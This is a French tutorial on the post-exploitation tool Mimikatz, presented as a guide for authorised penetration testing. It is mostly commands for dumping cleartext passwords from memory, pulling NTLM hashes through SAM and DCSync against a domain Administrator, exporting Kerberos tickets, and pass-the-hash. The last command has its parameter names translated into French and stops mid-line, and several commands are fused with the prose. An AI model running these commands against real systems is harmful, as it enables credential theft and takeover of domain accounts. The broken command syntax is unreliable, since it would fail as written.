Mimikatz est un puissant outil de post-exploitation conçu pour extraire de la mémoire des mots de passe en clair, des hachages, des codes PIN et des tickets Kerberos. Il est largement utilisé par les testeurs d’intrusion et les professionnels de la sécurité pour évaluer les vulnérabilités des systèmes. Ce guide fournit une approche pas à pas de l’installation et de l’utilisation de Mimikatz pour les tests de sécurité éthiques.
Avertissement : L’utilisation non autorisée de Mimikatz est illégale. Assurez-vous d’avoir l’autorisation avant de l’utiliser dans n’importe quel environnement.
Avant d’installer Mimikatz, assurez-vous que vous disposez des éléments suivants :
Mimikatz est un outil open-source disponible sur GitHub. Pour le télécharger :
Vous pouvez également cloner le dépôt à l’aide de Git :
git clone https://github.com/gentilkiwi/mimikatz.gitÉtant donné que Mimikatz nécessite des privilèges administratifs, suivez les étapes suivantes pour l’exécuter :
cd path\to\mimikatz\x64mimikatz.exemimikatz #.Avant d’extraire les informations d’identification, vérifiez que vous disposez des privilèges suffisants :
privilege::debugEn cas de succès, vous devriez voir : Privilège '20' OK
Pour extraire les mots de passe en clair de la mémoire, utilisez :
sekurlsa::logonpasswordsCela affichera le nom d’utilisateur, le domaine et les mots de passe en clair s’ils sont disponibles.
Les hachages NTLM peuvent être utilisés pour des attaques de type “pass-the-hash”. Pour les extraire, exécutez
lsadump::samOu, pour les systèmes distants :
lsadump::dcsync /domain:targetdomain.com /user:AdministratorPour extraire les tickets Kerberos du système :
sekurlsa::tickets /exportCela permet d’exporter des fichiers .kirbi, qui peuvent être utilisés dans des attaques de type “pass-the-ticket”.
Pour s’authentifier avec un hachage NTLM au lieu d’un mot de passe :
sekurlsa::pth /utilisateur:Administrateur /domaine:exemple.com /ntlm: